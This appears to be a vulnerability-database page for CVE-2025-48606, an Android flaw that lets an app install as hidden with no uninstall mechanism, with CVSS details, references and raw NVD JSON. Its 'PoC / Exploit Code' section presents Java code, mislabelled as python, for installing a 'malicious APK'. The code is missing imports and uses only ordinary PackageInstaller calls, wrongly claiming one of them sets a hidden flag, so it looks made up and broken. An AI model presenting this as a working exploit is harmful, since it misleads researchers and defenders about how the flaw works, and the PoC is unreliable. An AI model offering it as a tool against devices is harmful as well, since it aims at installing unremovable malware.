CVE-2025-48606

Description

In preparePackage of InstallPackageHelper.java, there is a possible way for an app to appear hidden upon installation without a mechanism to uninstall it due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:google:android:16.0:-:*:*:*:*:*:* - VULNERABLE

Android < 16 QPR2

Android 16 (受影响)

Android 16 QPR1 (可能受影响)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-48606 PoC - Android InstallPackageHelper Logic Error
// This PoC demonstrates the vulnerability in InstallPackageHelper.java
// Note: For authorized security testing only

import android.content.Context;
import android.content.pm.PackageManager;
import android.content.pm.PackageInfo;
import android.content.pm.PackageInstaller;
import android.net.Uri;
import java.io.File;
import java.io.InputStream;
import java.io.OutputStream;

public class CVE_2025_48606_PoC {
    
    private static final String MALICIOUS_APK_PATH = "/path/to/malicious.apk";
    
    /**
     * Exploit the InstallPackageHelper logic error
     * to install a hidden app without uninstall mechanism
     */
    public void exploitInstallPackageHelper(Context context) {
        try {
            PackageManager pm = context.getPackageManager();
            PackageInstaller packageInstaller = pm.getPackageInstaller();
            
            // Create session for package installation
            PackageInstaller.SessionParams params = 
                new PackageInstaller.SessionParams(
                    PackageInstaller.SessionParams.MODE_FULL_INSTALL
                );
            
            // Set hidden flag (exploiting the logic error)
            params.setInstallReason(
                PackageManager.INSTALL_REASON_POLICY
            );
            
            // Create installation session
            int sessionId = packageInstaller.createSession(params);
            PackageInstaller.Session session = 
                packageInstaller.openSession(sessionId);
            
            // Write malicious APK to session
            File apkFile = new File(MALICIOUS_APK_PATH);
            writeApkToSession(session, apkFile);
            
            // Commit installation (triggers the vulnerable code path)
            Intent statusReceiver = new Intent();
            session.commit(PendingIntent.getBroadcast(
                context, 0, statusReceiver, 
                PendingIntent.FLAG_MUTABLE
            ).getIntentSender());
            
            // The app is now installed as hidden without uninstall option
            
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
    
    private void writeApkToSession(PackageInstaller.Session session, 
                                    File apkFile) throws Exception {
        try (OutputStream out = session.openWrite(
                apkFile.getName(), 0, apkFile.length());
             InputStream in = new FileInputStream(apkFile)) {
            byte[] buffer = new byte[4096];
            int bytesRead;
            while ((bytesRead = in.read(buffer)) != -1) {
                out.write(buffer, 0, bytesRead);
            }
        }
    }
}

// References:
// - https://source.android.com/security/bulletin/android-16-qpr2
// - NVD: CVE-2025-48606

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-48606
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-48606
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-48606/
[4] VulDB https://vuldb.com/cve/CVE-2025-48606
[5] https://source.android.com/security/bulletin/android-16-qpr2

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-48606", "sourceIdentifier": "[email protected]", "published": "2025-12-08T18:15:51.563", "lastModified": "2025-12-08T21:15:58.577", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "In preparePackage of InstallPackageHelper.java, there is a possible way for an app to appear hidden upon installation without a mechanism to uninstall it due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:google:android:16.0:-:*:*:*:*:*:*", "matchCriteriaId": "02882AB1-7993-47DD-84A0-8DF4272D85ED"}]}]}], "references": [{"url": "https://source.android.com/security/bulletin/android-16-qpr2", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}]}}